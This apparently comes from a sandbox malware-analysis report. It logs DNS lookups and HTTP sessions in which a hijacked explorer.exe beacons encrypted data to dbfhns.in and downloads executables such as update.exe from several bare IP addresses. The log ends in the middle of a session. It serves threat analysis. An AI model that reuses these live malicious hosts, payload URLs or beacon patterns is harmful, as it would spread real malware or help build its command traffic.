                                                          May 27, 2024 00:30:05.952542067 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.899574041 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.904723883 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.904978991 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:06.907879114 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:06.914725065 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.300515890 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305608034 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.305713892 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305895090 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305944920 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.358172894 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.403393984 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.513031006 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.517847061 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.518043041 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:12.518043041 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:12.528981924 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:16.959786892 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.964862108 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:16.964952946 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.965106964 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.965137005 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:17.018687010 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.066822052 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.984780073 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.990066051 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.990134001 CEST4978480192.168.2.5186.112.12.192
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2024 00:27:13.974567890 CEST | 58478 | 53 | 192.168.2.5 | 1.1.1.1
May 27, 2024 00:27:13.999315977 CEST | 53 | 58478 | 1.1.1.1 | 192.168.2.5
May 27, 2024 00:27:24.792143106 CEST | 58021 | 53 | 192.168.2.5 | 1.1.1.1
May 27, 2024 00:27:24.812468052 CEST | 53 | 58021 | 1.1.1.1 | 192.168.2.5
May 27, 2024 00:27:55.144258022 CEST | 50956 | 53 | 192.168.2.5 | 1.1.1.1
May 27, 2024 00:27:55.152259111 CEST | 53 | 50956 | 1.1.1.1 | 192.168.2.5
May 27, 2024 00:29:06.345964909 CEST | 53358 | 53 | 192.168.2.5 | 1.1.1.1
May 27, 2024 00:29:06.961252928 CEST | 53 | 53358 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 27, 2024 00:27:13.974567890 CEST | 192.168.2.5 | 1.1.1.1 | 0xd59 | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:24.792143106 CEST | 192.168.2.5 | 1.1.1.1 | 0xb381 | Standard query (0) | whispedwoodmoodsksl.shop | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:55.144258022 CEST | 192.168.2.5 | 1.1.1.1 | 0x3cdc | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.345964909 CEST | 192.168.2.5 | 1.1.1.1 | 0x206e | Standard query (0) | dbfhns.in | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 187.143.58.5 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 213.172.74.157 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 186.145.236.93 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 123.140.161.243 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 197.44.77.26 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 186.101.193.110 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 5.42.246.42 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 190.28.110.209 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:13.999315977 CEST | 1.1.1.1 | 192.168.2.5 | 0xd59 | No error (0) | dbfhns.in |  | 190.13.174.94 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:24.812468052 CEST | 1.1.1.1 | 192.168.2.5 | 0xb381 | No error (0) | whispedwoodmoodsksl.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:24.812468052 CEST | 1.1.1.1 | 192.168.2.5 | 0xb381 | No error (0) | whispedwoodmoodsksl.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:27:55.152259111 CEST | 1.1.1.1 | 192.168.2.5 | 0x3cdc | No error (0) | steamcommunity.com |  | 104.102.42.29 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 186.112.12.192 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 186.233.231.45 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 190.28.110.209 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 190.187.52.42 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 63.143.98.185 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 181.52.122.51 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 201.119.118.19 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 189.143.157.177 | A (IP address) | IN (0x0001) | false
May 27, 2024 00:29:06.961252928 CEST | 1.1.1.1 | 192.168.2.5 | 0x206e | No error (0) | dbfhns.in |  | 187.152.16.62 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 00:27:14.005469084 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nbtdsjawscshri.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 308
                                                          Host: dbfhns.in
May 27, 2024 00:27:14.993361950 CEST | 152 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:14 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 04 00 00 00 72 e8 85 ec
                                                          Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 00:27:15.022691011 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gitrvlonrfqrq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 358
                                                          Host: dbfhns.in
May 27, 2024 00:27:16.009608984 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:15 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49713 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 00:27:16.337150097 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ltjhtqaytuwkyt.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 301
                                                          Host: dbfhns.in
May 27, 2024 00:27:17.349195957 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:17 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49714 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 00:27:17.401782990 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rjjvubikquby.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 259
                                                          Host: dbfhns.in
May 27, 2024 00:27:18.533272982 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:18 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49715 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 00:27:18.565315008 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ctkjptrcxdnjtm.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 191
                                                          Host: dbfhns.in
May 27, 2024 00:27:19.546773911 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:19 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.5 | 49716 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:19.578145027 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eisoaquivduh.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 201
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:19.578180075 CEST | 201 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 60 18 c2 ff
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu`YXXcGh 0dn6y@X;LALN~0NFLYX0,
                                                          May 27, 2024 00:27:20.562275887 CEST | 191 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:20 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                          Data Ascii: #\-^$aD++3^|


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.5 | 49717 | 45.129.96.86 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:20.576462984 CEST | 165 | OUT | GET /file/update.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 45.129.96.86
                                                          May 27, 2024 00:27:21.278526068 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.22.1
                                                          Date: Sun, 26 May 2024 22:27:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 325120
                                                          Last-Modified: Sun, 26 May 2024 22:20:02 GMT
                                                          Connection: keep-alive
                                                          ETag: "6653b592-4f600"
                                                          Accept-Ranges: bytes


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.5 | 49718 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:22.060745955 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wbiuottwvhtdjd.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 328
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:22.060791016 CEST | 328 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 23 25 bc eb
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA ,[k,vu#%}Uj[lXr#2Hg1CB^/!z-b :&~htsUBOM}bwHwI.NMGl~,F%
                                                          May 27, 2024 00:27:23.039649010 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:22 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.5 | 49719 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:24.492005110 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eevetcrfdfleqxq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 187
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:24.492027998 CEST | 187 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7a 54 fb 82
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vuzTOK>.pD8+)|>^mB;;D]Z-Q|*E.%|H9k.u2a3
                                                          May 27, 2024 00:27:25.491470098 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:25 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.5 | 49721 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:25.797523975 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://unanbdkiibq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 299
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:25.797558069 CEST | 299 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 44 1c a6 f7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vuDwGnbl3qDt=GmXd)]FE]W5Dg UMx{C> jSIip\v\mF"QAdq#
                                                          May 27, 2024 00:27:26.818525076 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:26 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.5 | 49723 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:26.891612053 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://hfcngeudnubrryg.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 111
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:26.891612053 CEST | 111 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 22 2c b3 85
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu",NVosN1b]
                                                          May 27, 2024 00:27:27.886953115 CEST | 190 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:27 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                          Data Ascii: #\+X$mD2 *a


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.5 | 49725 | 23.145.40.124 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:27.951931000 CEST | 164 | OUT | GET /pintxi1lv.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 23.145.40.124


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.5 | 49729 | 185.235.137.54 | 80 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:32.903697968 CEST | 205 | OUT | GET /file/host_so.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Host: 185.235.137.54


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.5 | 49737 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:49.450237989 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://fgaaagvpavk.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 313
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:49.450237989 CEST | 313 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 29 0b fa aa
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu)nRCH^IN^$[_*|a]3JT#d/:u&iyV"wq0M-]:vvXttx.bmb%~
                                                          May 27, 2024 00:27:50.448736906 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:50 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.5 | 49739 | 187.143.58.5 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:50.525998116 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://qvvaotfskdoxlio.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 361
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:50.526015997 CEST | 361 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 6c 41 db 89
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vulA'fk{n[>[c[\k~tJSZ0y#A(S2^KzjQ>cfST7m5rc=XR4$C[
                                                          May 27, 2024 00:27:51.532396078 CEST | 210 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:51 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                          Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.5 | 49741 | 91.202.233.231 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:27:51.635869980 CEST | 184 | OUT | GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                          Connection: Keep-Alive
